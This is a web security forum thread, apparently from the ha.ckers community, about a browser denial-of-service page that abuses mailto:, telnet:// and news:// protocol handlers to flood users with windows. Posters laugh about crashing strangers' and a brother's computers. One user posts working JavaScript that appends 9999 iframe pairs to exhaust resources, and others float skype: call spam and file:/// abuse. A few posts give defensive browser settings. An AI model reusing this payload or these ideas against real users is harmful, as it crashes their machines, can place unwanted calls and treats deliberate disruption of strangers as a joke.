One of the things I built was the mailto tag popup DoS located here: http://ha.ckers.org/weird/popup.html

I was playing around with other ways to do this, like perhaps include things like news:// or other directives that could spawn additional resources towards the end goal of memory exhaustion or otherwise getting the user so confused that they cannot stop whatever is happening. I have a feeling there is an exploit buried in here, beyond buffer overflows, but actually through the art of confusion and user panic.

- RSnake
Gotta love it. http://ha.ckers.org

Well my stupid little mailto DoS got on Digg (waaaaay down the page). In one day a thousand people went to that page. 1000 people had their day ruined: http://www.digg.com/security/How_To_Crash_Internet_Explorer

- RSnake
Gotta love it. http://ha.ckers.org

Go to about:config, set network.protocol-handler.external.mailto to false. Firefox will no longer have mailto: do anything.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Hmm... I might just do that, even though it also disables somewhat useful mailto links. It takes way to long for Thunderbird to boot up anyway.

Thank you, WhiteAcid, that's great... I accidentally nailed myself with my own script the other day. Even though I caught it almost immediately it had enough time to still spawn about 50 windows. Ugh!

- RSnake
Gotta love it. http://ha.ckers.org

Still, while setting network.protocol-handler.external.mailto to false, firefox crashes. I guess this is because there is a script that loops the <IFRAME></IFRAME> tag an awful lot of times?

If i stop the page load, Firefox hangs abit and eats up all of my CPU for a short period, but eventually it drops and gets normal.


Man, I got annoyed when i clicked the link .. (do'h) Oh well, long live the curiosity :P



Edited 1 time(s). Last edit at 07/01/2007 05:07PM by Moccah.

I never should have told RSnake to add that damn refresh. Even being safe from the mailto crash, that page kills me too.

- Kyran

hahah... not super practical but good for a laugh.

- RSnake
Gotta love it. http://ha.ckers.org

For the record, it's even more painful if your default application is something monstrous (like Lotus Notes).

Just imagine, I'm sure you'll chuckle.

Erm, this seems to have been fixed with the newer version of FireFox.

meta-human.net

How is it fixed out of curiosity? Can it only instantiate it once or something?

- RSnake
Gotta love it. http://ha.ckers.org

Nope, doesn't seem fixed.

Haha, tested this on my brother, it spawned enough IE windows that the only way out was a reboot. How the heck does it work even with javascript disabled?

javascript has nothing to do with mailto: its how your browser/mail client handles when a mailto link is launched

http://www.xssed.com/archive/author=PaPPy/

@RSnake, Metahuman, trev:
maybe Metahuman believed it was fixed because he's using NoScript, which has been blocking this kind of "attack" (automatic opening of external protocol URLs) for a long time.

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

I've coded one more thing that definitely makes user to panic, but it works in Safari on Windows only, because it allows to open external Telnet applications.
Maybe it also works on MacOS - I haven't been able to test.
Try it in your Safari :) combined with mailto confusion it becomes totally cool thing. Going to post it at blog.
Besides, I think there are some ways to seriously exploit external applications handler in Safari. Maybe play around with file:/// or smth like?

<body />
<script>
    function makeFrameTelnet() {
    ifrm = document.createElement("IFRAME");
    ifrm.src = 'telnet://nonexistent.com:80';
    document.body.appendChild(ifrm);
    }
</script>
<script>
    function makeFrameNews() {
    ifrm = document.createElement("IFRAME");
    ifrm.src = 'news://nonexistent.com';
    document.body.appendChild(ifrm);
    }
</script>
<script>
    for (i=0; i < 9999; i++) {
    makeFrameTelnet()
    makeFrameNews()
    }
</script>

---------
http://p0deje.blogspot.com

External applications handler is really sucks in Safari (and in IE too)
For example using iframe with src="skype:echo123?call" in infinite loop makes Skype to call there
It seems that there are certain ways for spamming using Safari and Skype URI

---------
http://p0deje.blogspot.com